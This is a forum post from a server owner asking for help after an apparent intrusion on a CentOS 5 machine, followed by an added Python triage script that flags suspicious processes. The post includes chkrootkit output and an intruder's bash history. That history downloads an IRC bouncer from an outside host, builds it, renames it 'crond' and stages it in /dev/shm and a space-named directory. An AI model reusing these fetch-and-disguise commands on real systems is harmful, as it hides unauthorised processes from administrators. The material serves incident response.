Hello!
@noob inside!!
Some clever chap (much cleverer than me, since I know nothing about this) has almost certainly broken into my little Linux server (CentOS 5).
A brief history:
Chkrootkit added this to its logs:
Code:
Warning: `//root/.bash_history //home/.bash_history //var/html/.bash_history' file size is zero
INFECTED (PORTS: 465)
The tty of the following user process(es) were not found
in /var/run/utmp !
! root 3921 tty1 /sbin/mingetty tty1
! root 3922 tty2 /sbin/mingetty tty2
! root 3925 tty3 /sbin/mingetty tty3
! root 3928 tty4 /sbin/mingetty tty4
! root 3929 tty5 /sbin/mingetty tty5
! root 3930 tty6 /sbin/mingetty tty6
! root 13082 pts/1 /bin/bash

clamav has refused to log properly since Friday; alert mail:
Code:
/etc/cron.hourly/freshclam:
ERROR: Can't open /var/log/clamav/freshclam.log in append mode (check permissions!).
/etc/cron.hourly/inn-cron-nntpsend:
cannot determine current run level
/etc/cron.hourly/inn-cron-rnews:
cannot determine current run level
/etc/cron.hourly/mcelog:

and a chkrootkit -x lkm gives me:
ROOTDIR is `/'
find: WARNING: Hard link count is wrong for /proc/1: this may be a bug in your filesystem driver. Automatically turning on find's -noleaf option. Earlier results may have failed to include directories that should have been searched.
###
### Output of: ./chkproc -v -v -p 3
###
CWD 11859: /
EXE 11859: /usr/local/psa/admin/bin/modules/watchdog/monit
CWD 13185: /var/lib/mysql
EXE 13185: /usr/libexec/mysqld
CWD 13186: /var/lib/mysql
EXE 13186: /usr/libexec/mysqld
CWD 13187: /var/lib/mysql
EXE 13187: /usr/libexec/mysqld
CWD 13188: /var/lib/mysql
EXE 13188: /usr/libexec/mysqld
CWD 13193: /var/lib/mysql
EXE 13193: /usr/libexec/mysqld
CWD 13194: /var/lib/mysql
EXE 13194: /usr/libexec/mysqld
CWD 13195: /var/lib/mysql
EXE 13195: /usr/libexec/mysqld
CWD 13196: /var/lib/mysql
EXE 13196: /usr/libexec/mysqld
CWD 13240: /home/dumas/ /sbnc
EXE 13240: /home/dumas/ /sbnc/bin/sbnc
CWD 13771: /var/lib/mysql
EXE 13771: /usr/libexec/mysqld
CWD 28578: /var/named/run-root/var
EXE 28578: /usr/sbin/named
CWD 28579: /var/named/run-root/var
EXE 28579: /usr/sbin/named
CWD 28580: /var/named/run-root/var
EXE 28580: /usr/sbin/named
CWD 28581: /var/named/run-root/var
EXE 28581: /usr/sbin/named
CWD 28962: /
EXE 28962: /usr/sbin/automount
CWD 28963: /
EXE 28963: /usr/sbin/automount
CWD 28966: /
EXE 28966: /usr/sbin/automount
CWD 28969: /
EXE 28969: /usr/sbin/automount
CWD 29323: /
EXE 29323: /sbin/auditd
CWD 29325: /
EXE 29325: /sbin/audispd
CWD 29816: /
EXE 29816: /usr/sbin/pcscd

This "dumas" user has just appeared on my system in /home/dumas/, with this .bash_history:
Code:
cd /dev/shm
w
ps x
cd /dev/shm
ls -as
cd sbnc-1.3beta6
cd src
ls -as
mv cron sbnc
./sbnc
./sbnc
ps x
kill -9 30017
./sbnc
kill -9 30017
ps x
kill -9 30110
mv sbnc crond
PATH=:$PATH
crond
ps x
cd /dev/shm
ls -as
cd " . "
ls -as
cd sbnc-1.3beta6
make
cd /home
las -as
ls -as
cd /dev/shm
ls -as
wget http://www.shroudbnc.info/redmine/attachments/download/28/sbnc-1.3beta6.tar.gz
tar zxvf sbnc-1.3beta6.tar.gz
cd sbnc-1.3beta6
ls -sd
ls -as
./configure
make
make install
ls -as
cd src
ls -as
ps x
mv sbnc cron
PATH=:$PATH
crond
ps x
kill -9 30124
cd /dev/shm
ls -as
rm -rf *
cd
wget http://www.shroudbnc.info/redmine/attachments/download/28/sbnc-1.3beta6.tar.gz
tar zxvf sbnc-1.3beta6.tar.gz
rm -rf sbnc-1.3beta6.tar.gz
cd sbnc-1.3beta6
ls -as
./configure
./configure*
chmod +x *
make
./make insall
/make install
./make
make install
ls -as
cd php
ls -as
cd src
ls -as
cd ..
cd src
ls .as
ls -as
./sbnc
ps x
kill -9 11764
cd ..
ls -as
cd ..
ls -as
cd sbnc
ls -as
./sbnc
./sbnc
ls -as
ps x
kill -9 12718
mv sbnc crond
PATH=:$PATH
crond
w
last
ps x
kill -9 30461 16431 3356

Help!!! I'm in a cold sweat here...
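As an added example (not part of the original post, and not chkrootkit's own code), here is a small Python triage script that parses `chkproc -v -v` lines like the ones above and flags the things a responder would look at first: executables running out of `/dev/shm`, `/tmp` or a home directory, path components that are nothing but whitespace or dots (the `" "` directory visible in `/home/dumas/ /sbnc`, and the `cd " . "` in the history), and a process named after a system daemon such as `crond` whose binary does not live in a system directory. The sample lines are copied from the post, plus one constructed CWD/EXE pair (pid 30461, a renamed `crond` under `/dev/shm`) so the mimicry rule has something to fire on; the trusted-prefix, staging-prefix and daemon-name lists are my assumptions, not anything chkrootkit ships.

```python
import re

# Constructed sample: lines in the format "chkproc -v -v" prints. The first
# three process pairs are copied from the post; the pid 30461 pair is invented
# to show the daemon-name mimicry rule (the history shows "mv sbnc crond").
SAMPLE_CHKPROC_OUTPUT = """\
CWD 13185: /var/lib/mysql
EXE 13185: /usr/libexec/mysqld
CWD 13240: /home/dumas/ /sbnc
EXE 13240: /home/dumas/ /sbnc/bin/sbnc
CWD 28578: /var/named/run-root/var
EXE 28578: /usr/sbin/named
CWD 30461: /dev/shm/sbnc-1.3beta6/src
EXE 30461: /dev/shm/sbnc-1.3beta6/src/crond
"""

LINE_RE = re.compile(r"^(CWD|EXE) (\d+): (.*)$")

# Assumed lists (not from chkrootkit): where packaged daemons normally live on
# CentOS 5, where intruders typically stage files, and daemon names commonly
# borrowed to hide a process in "ps" output.
TRUSTED_EXE_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                        "/usr/libexec/", "/usr/lib/", "/usr/local/")
STAGING_PREFIXES = ("/dev/shm/", "/tmp/", "/var/tmp/", "/home/")
MIMICRY_NAMES = {"crond", "cron", "sshd", "httpd", "named", "mysqld"}


def parse_chkproc(text):
    """Return {pid: {"CWD": path, "EXE": path}} from chkproc -v -v output.
    Lines that are not CWD/EXE records (banners, find warnings) are skipped."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        kind, pid, path = m.groups()
        procs.setdefault(int(pid), {})[kind] = path
    return procs


def odd_path_component(path):
    """True if any directory name in the path consists only of spaces and dots
    (e.g. " " or " . "), excluding the legitimate "." and ".." entries."""
    for comp in path.split("/"):
        if comp and comp not in (".", "..") and comp.strip(" .") == "":
            return True
    return False


def assess(procs):
    """Return [(pid, exe, [reasons])] for every process that trips a rule."""
    findings = []
    for pid, info in sorted(procs.items()):
        exe = info.get("EXE", "")
        cwd = info.get("CWD", "")
        reasons = []
        if exe.startswith(STAGING_PREFIXES):
            reasons.append("executable lives in a staging directory")
        if odd_path_component(exe) or odd_path_component(cwd):
            reasons.append("path contains a whitespace/dot-only directory name")
        name = exe.rsplit("/", 1)[-1]
        if name in MIMICRY_NAMES and not exe.startswith(TRUSTED_EXE_PREFIXES):
            reasons.append(f"named like system daemon '{name}' but outside system directories")
        if reasons:
            findings.append((pid, exe, reasons))
    return findings


if __name__ == "__main__":
    for pid, exe, reasons in assess(parse_chkproc(SAMPLE_CHKPROC_OUTPUT)):
        print(f"pid {pid}: {exe}")
        for r in reasons:
            print(f"    - {r}")
```

Run against the post's real output, pid 13240 is reported for both the `/home/` location and the space-named directory, and every mysqld/named/automount entry stays quiet. The script deliberately works on the saved text rather than the live `/proc`, so it can be run on a copy taken off the box before anything is changed.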